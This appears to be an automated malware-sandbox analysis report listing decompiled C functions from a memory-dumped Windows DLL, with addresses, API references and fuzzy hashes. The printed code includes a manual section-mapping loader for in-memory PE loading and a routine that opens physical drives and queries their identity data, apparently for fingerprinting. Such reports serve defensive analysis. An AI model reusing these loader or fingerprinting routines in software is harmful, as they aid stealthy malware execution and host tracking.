                                                                                                                                                                  0x1001ad0a
                                                                                                                                                                  0x1001ad13
                                                                                                                                                                  0x1001ad13
                                                                                                                                                                  0x1001ad16
                                                                                                                                                                  0x1001ace8
                                                                                                                                                                  0x1001acf0
                                                                                                                                                                  0x1001acfc
                                                                                                                                                                  0x1001acfc
                                                                                                                                                                  0x1001ad2d
                                                                                                                                                                  0x1001ad2d
                                                                                                                                                                  0x1001ad30
                                                                                                                                                                  0x1001ad33
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad35
                                                                                                                                                                  0x1001ad3a
                                                                                                                                                                  0x1001ad40
                                                                                                                                                                  0x1001ad72
                                                                                                                                                                  0x1001ad78
                                                                                                                                                                  0x1001ad7f
                                                                                                                                                                  0x1001ad7f
                                                                                                                                                                  0x1001ad8a
                                                                                                                                                                  0x1001ad8d
                                                                                                                                                                  0x1001ad8f
                                                                                                                                                                  0x1001ad95
                                                                                                                                                                  0x1001ad42
                                                                                                                                                                  0x1001ad45
                                                                                                                                                                  0x1001ad5b
                                                                                                                                                                  0x1001ad5e
                                                                                                                                                                  0x1001ad60
                                                                                                                                                                  0x1001ad66
                                                                                                                                                                  0x1001ad66
                                                                                                                                                                  0x1001ad97
                                                                                                                                                                  0x1001ad9a
                                                                                                                                                                  0x1001ad9d
                                                                                                                                                                  0x1001ada8
                                                                                                                                                                  0x1001ad1b
                                                                                                                                                                  0x1001ad21
                                                                                                                                                                  0x1001ad27
                                                                                                                                                                  0x1001ad27
                                                                                                                                                                  0x1001ad2a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad9d
                                                                                                                                                                  0x1001adad
                                                                                                                                                                  0x1001adad
                                                                                                                                                                  0x1001adb1
                                                                                                                                                                  0x1001add3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001adb3
                                                                                                                                                                  0x1001adb3
                                                                                                                                                                  0x1001adb6
                                                                                                                                                                  0x1001adc1
                                                                                                                                                                  0x1001adc4
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x1001ac8c
                                                                                                                                                                  0x1001ac8c
                                                                                                                                                                  0x1001ac8f
                                                                                                                                                                  0x1001ac9a
                                                                                                                                                                  0x1001ac9d
                                                                                                                                                                  0x1001aca4
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x1001ac52
                                                                                                                                                                  0x1001ac52
                                                                                                                                                                  0x1001ac54
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac50
                                                                                                                                                                  0x1001add8
                                                                                                                                                                  0x1001add8
                                                                                                                                                                  0x1001adde

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
                                                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 1001AC54
                                                                                                                                                                  • _realloc.LIBCMT ref: 1001AC7B
                                                                                                                                                                  • SetLastError.KERNEL32(0000000E), ref: 1001ACA4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$Read_realloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 252108943-0
                                                                                                                                                                  • Opcode ID: ffd7bd065a5375d1ebe31af1967e484376c6c7ee4950f7abf1876d27f8b6798f
                                                                                                                                                                  • Instruction ID: e88f51b13af380f3804dcf3f93825a158e3d85187cb32834387337e861583c44
                                                                                                                                                                  • Opcode Fuzzy Hash: ffd7bd065a5375d1ebe31af1967e484376c6c7ee4950f7abf1876d27f8b6798f
                                                                                                                                                                  • Instruction Fuzzy Hash: EE01EF74A00208EFDB04CF94D985BADB7B1FF49315F618198E90AAB390C778AA81DF50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001B360, Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E1001B360(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t95;
				void* _t100;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;

				_t141 = __esi;
				_t140 = __edi;
				_t100 = __ebx;
				_t2 = _a16 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_t6 =  *_a16 + 0x14; // 0x2b34508b
				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b9bd
				_v24 =  *_a16 + _t8;
				_v8 = 0;
				while(1) {
					_t16 =  *_a16 + 6; // 0xe2e905
					if(_v8 >= ( *_t16 & 0x0000ffff)) {
						break;
					}
					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
						_t44 = _v24 + 0x14; // 0x2b34508b
						_t46 = _v24 + 0x10; // 0xb04d8b02
						_t78 = E1001AEA0(_a8,  *_t44 +  *_t46);
						_t143 = _t142 + 8;
						if(_t78 != 0) {
							_t49 = _a16 + 0x34; // 0x8b0aeb18
							_t51 = _v24 + 0x10; // 0xb04d8b02
							_t54 = _v24 + 0xc; // 0x8bb8558b
							_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
							_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
							_t144 = _t143 + 0x14;
							_v12 = _t82;
							if(_v12 != 0) {
								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
								E1000D1F0(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
								_t142 = _t144 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t25 = _a16 + 0x34; // 0x8b0aeb18
					_t29 = _v24 + 0xc; // 0x8bb8558b
					_t31 = _a16 + 0x1c; // 0x8b1874b4
					_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
					_t145 = _t142 + 0x14;
					_v12 = _t95;
					if(_v12 != 0) {
						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E1000CF80(_t140, _v12, 0, _v16);
						_t142 = _t145 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}


















                                                                                                                                                                  0x1001b360
                                                                                                                                                                  0x1001b360
                                                                                                                                                                  0x1001b360
                                                                                                                                                                  0x1001b369
                                                                                                                                                                  0x1001b36c
                                                                                                                                                                  0x1001b379
                                                                                                                                                                  0x1001b37d
                                                                                                                                                                  0x1001b381
                                                                                                                                                                  0x1001b384
                                                                                                                                                                  0x1001b39f
                                                                                                                                                                  0x1001b3a4
                                                                                                                                                                  0x1001b3ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b3b8
                                                                                                                                                                  0x1001b42f
                                                                                                                                                                  0x1001b435
                                                                                                                                                                  0x1001b43d
                                                                                                                                                                  0x1001b442
                                                                                                                                                                  0x1001b447
                                                                                                                                                                  0x1001b450
                                                                                                                                                                  0x1001b45e
                                                                                                                                                                  0x1001b468
                                                                                                                                                                  0x1001b46f
                                                                                                                                                                  0x1001b472
                                                                                                                                                                  0x1001b474
                                                                                                                                                                  0x1001b477
                                                                                                                                                                  0x1001b47e
                                                                                                                                                                  0x1001b48d
                                                                                                                                                                  0x1001b4a5
                                                                                                                                                                  0x1001b4aa
                                                                                                                                                                  0x1001b4b3
                                                                                                                                                                  0x1001b38d
                                                                                                                                                                  0x1001b393
                                                                                                                                                                  0x1001b39c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b39c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b480
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b449
                                                                                                                                                                  0x1001b3c0
                                                                                                                                                                  0x1001b3c7
                                                                                                                                                                  0x1001b427
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b427
                                                                                                                                                                  0x1001b3cc
                                                                                                                                                                  0x1001b3e1
                                                                                                                                                                  0x1001b3e8
                                                                                                                                                                  0x1001b3eb
                                                                                                                                                                  0x1001b3ed
                                                                                                                                                                  0x1001b3f0
                                                                                                                                                                  0x1001b3f7
                                                                                                                                                                  0x1001b409
                                                                                                                                                                  0x1001b412
                                                                                                                                                                  0x1001b41f
                                                                                                                                                                  0x1001b424
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b424
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b3f9
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2102423945-0
                                                                                                                                                                  • Opcode ID: c8d1c34ba2033493e17770d96ce252c75c4e45244ca9a8230eca39014b465cc1
                                                                                                                                                                  • Instruction ID: 428323ba92f151b8b30d7bb4fc73863c6a18c270ec47e82ee642a415afc306ef
                                                                                                                                                                  • Opcode Fuzzy Hash: c8d1c34ba2033493e17770d96ce252c75c4e45244ca9a8230eca39014b465cc1
                                                                                                                                                                  • Instruction Fuzzy Hash: B151B8B4A0010ADFCB04DF94D991EAEB7B5FF48304F248598E915AB346D730EE91CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001AB50, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AB50(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}





                                                                                                                                                                  0x1001ab58
                                                                                                                                                                  0x1001ab5e
                                                                                                                                                                  0x1001ab65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ab6b
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: df3a10f6024f408f15b2ad5c72ac785c734b8422dadc8378e0f8f39ab19adcd3
                                                                                                                                                                  • Instruction ID: 7c1de59f615f24355edd2097ee5eee0132e4033acb49ab430aa32c1c2748079c
                                                                                                                                                                  • Opcode Fuzzy Hash: df3a10f6024f408f15b2ad5c72ac785c734b8422dadc8378e0f8f39ab19adcd3
                                                                                                                                                                  • Instruction Fuzzy Hash: 54D0927494924CEBCB10DFA4D988A8DB7F8EB09651F204595ED0997201D6319EC09AA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001AB20, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AB20(struct HINSTANCE__* _a4) {
				int _t3;

				_t3 = FreeLibrary(_a4); // executed
				return _t3;
			}




                                                                                                                                                                  0x1001ab27
                                                                                                                                                                  0x1001ab2e

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: ab945b5bb3a6449f56287117bc969cb560d4c6e8115a263d146fdd92f26bef0a
                                                                                                                                                                  • Instruction ID: 0a2297a1539f5fd842531728876dcceabbf5482a0c4fce057fc6f77852d15200
                                                                                                                                                                  • Opcode Fuzzy Hash: ab945b5bb3a6449f56287117bc969cb560d4c6e8115a263d146fdd92f26bef0a
                                                                                                                                                                  • Instruction Fuzzy Hash: BBB0123200031CABCE005BD8D8888C537AC96085117010000F70C83100CA30F48046D4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000EC31, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E1000EC31(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E100152B4();
				_push(_a4);
				_t5 = L1000EB34(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}





                                                                                                                                                                  0x1000ec31
                                                                                                                                                                  0x1000ec36
                                                                                                                                                                  0x1000ec42
                                                                                                                                                                  0x1000ec48

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___security_init_cookie.LIBCMT ref: 1000EC31
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___security_init_cookie
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3657697845-0
                                                                                                                                                                  • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                  • Instruction ID: e6deafa1040a52db75f664394f4ca8d863cdd32d4507f565b6a3541a6f58ca8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                  • Instruction Fuzzy Hash: 88B0923A10A340EB8204CB20D482C0FB3A2EBD4311F24C90DF8A61A2558B31EC60EA52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10004530, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E10004530(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed char* _v56;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				char* _v148;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				void* _t63;
				void* _t70;
				void* _t73;
				intOrPtr* _t76;
				intOrPtr _t86;
				intOrPtr _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t102 = __eflags;
				_t55 = _a4;
				_t96 = _a8;
				_v184 = E100044A0;
				_v180 = E100044D0;
				_v176 = _t55;
				_v172 = _t55;
				_v168 = _t96;
				_t97 = 0;
				E10007200();
				_v216 = E100046D0;
				_v212 = E100046F0;
				_v200 = E100046D0;
				_v196 = E100046F0;
				E10007540( &_v164, 0);
				_v136 = 0;
				_v136 = _v216( &_v216, _t96);
				_v132 = _t96;
				_v148 =  &_v184;
				_v140 = 0;
				_v144 = 0;
				E100048B0(_t102,  &_v128);
				_t63 = E10006FE0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
				_t100 =  &_v220 + 0x24;
				if(_t63 == 0) {
					_v204 = 0xffffffff;
					_v208 = 0;
					_v220 = 0;
					_v192 = 0;
					_v188 = 0;
					if(( *_v56 & 0x00000080) == 0) {
						_t70 = E10007020( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
						_t100 = _t100 + 0x28;
						if(_t70 == 0) {
							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
							_t97 = _t73;
							if(_t97 != 0) {
								_t76 = _a12;
								_t107 = _t76;
								_t86 = _v220;
								if(_t76 != 0) {
									 *_t76 = _t86;
								}
								E1000D1F0(0, _t96, _t97, _t97, _v208, _t86);
								_t100 = _t100 + 0xc;
								 *((char*)(_v220 + _t97)) = 0;
							}
							_v212( &_v216, _v208);
							_t100 = _t100 + 8;
						}
					}
				}
				E100048F0(_t107,  &_v128,  &_v216);
				return _t97;
			}






































                                                                                                                                                                  0x10004530
                                                                                                                                                                  0x10004536
                                                                                                                                                                  0x10004540
                                                                                                                                                                  0x10004547
                                                                                                                                                                  0x1000454f
                                                                                                                                                                  0x10004557
                                                                                                                                                                  0x1000455b
                                                                                                                                                                  0x1000455f
                                                                                                                                                                  0x10004565
                                                                                                                                                                  0x10004567
                                                                                                                                                                  0x10004572
                                                                                                                                                                  0x1000457a
                                                                                                                                                                  0x10004582
                                                                                                                                                                  0x1000458a
                                                                                                                                                                  0x10004592
                                                                                                                                                                  0x1000459d
                                                                                                                                                                  0x100045a5
                                                                                                                                                                  0x100045b2
                                                                                                                                                                  0x100045b6
                                                                                                                                                                  0x100045ba
                                                                                                                                                                  0x100045be
                                                                                                                                                                  0x100045c2
                                                                                                                                                                  0x100045de
                                                                                                                                                                  0x100045e3
                                                                                                                                                                  0x100045e8
                                                                                                                                                                  0x100045f5
                                                                                                                                                                  0x100045fd
                                                                                                                                                                  0x10004601
                                                                                                                                                                  0x10004605
                                                                                                                                                                  0x10004609
                                                                                                                                                                  0x10004610
                                                                                                                                                                  0x10004647
                                                                                                                                                                  0x1000464c
                                                                                                                                                                  0x10004651
                                                                                                                                                                  0x10004663
                                                                                                                                                                  0x10004669
                                                                                                                                                                  0x1000466d
                                                                                                                                                                  0x1000466f
                                                                                                                                                                  0x10004676
                                                                                                                                                                  0x10004678
                                                                                                                                                                  0x1000467c
                                                                                                                                                                  0x1000467e
                                                                                                                                                                  0x1000467e
                                                                                                                                                                  0x10004687
                                                                                                                                                                  0x10004690
                                                                                                                                                                  0x10004693
                                                                                                                                                                  0x10004693
                                                                                                                                                                  0x100046a0
                                                                                                                                                                  0x100046a4
                                                                                                                                                                  0x100046a4
                                                                                                                                                                  0x10004651
                                                                                                                                                                  0x10004610
                                                                                                                                                                  0x100046b1
                                                                                                                                                                  0x100046c4

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004663
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: 5a1338e426cb75d2ca51680c2dac79a4975bfac74c382e52e88c4a0326a2e4fd
                                                                                                                                                                  • Instruction ID: 6d5649bfcbb4bdf90b27f5f2c4f34706eb8148ffe7853cac92dd8e65470b9804
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a1338e426cb75d2ca51680c2dac79a4975bfac74c382e52e88c4a0326a2e4fd
                                                                                                                                                                  • Instruction Fuzzy Hash: E34129B2408341AFD310CF54D88099BBBE8FBC8284F414A2EF59587215EB71E549CFA7
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001AB80, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AB80(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                                                                                                                  0x1001ab8f
                                                                                                                                                                  0x1001ab96

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 1001AB8F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                  • Opcode ID: c9b92633b5be4d05357bd559152b14f70f0dc8abda5fe75a7777c4d758cee15d
                                                                                                                                                                  • Instruction ID: b8619c9825cd0fa0e3a42403664708fb370f354c31c9415efada841c1c062db3
                                                                                                                                                                  • Opcode Fuzzy Hash: c9b92633b5be4d05357bd559152b14f70f0dc8abda5fe75a7777c4d758cee15d
                                                                                                                                                                  • Instruction Fuzzy Hash: 29C04C7611420CABCB04DF98DCC4CAB37BDAB8C710B108508FB1D87200CA34F9518BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 1001D840, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1001D840(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF80(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF80(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF80( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CDD0( &_v1596);
					_t94 = E1001D000(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}





































                                                                                                                                                                  0x1001d840
                                                                                                                                                                  0x1001d84c
                                                                                                                                                                  0x1001d853
                                                                                                                                                                  0x1001dac4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dac4
                                                                                                                                                                  0x1001d859
                                                                                                                                                                  0x1001d863
                                                                                                                                                                  0x1001d86d
                                                                                                                                                                  0x1001d87a
                                                                                                                                                                  0x1001d891
                                                                                                                                                                  0x1001d8ac
                                                                                                                                                                  0x1001d8b2
                                                                                                                                                                  0x1001d8d1
                                                                                                                                                                  0x1001d8d8
                                                                                                                                                                  0x1001da9d
                                                                                                                                                                  0x1001daac
                                                                                                                                                                  0x1001dab5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dabf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dab7
                                                                                                                                                                  0x1001d8de
                                                                                                                                                                  0x1001d8e8
                                                                                                                                                                  0x1001d8f2
                                                                                                                                                                  0x1001d8fc
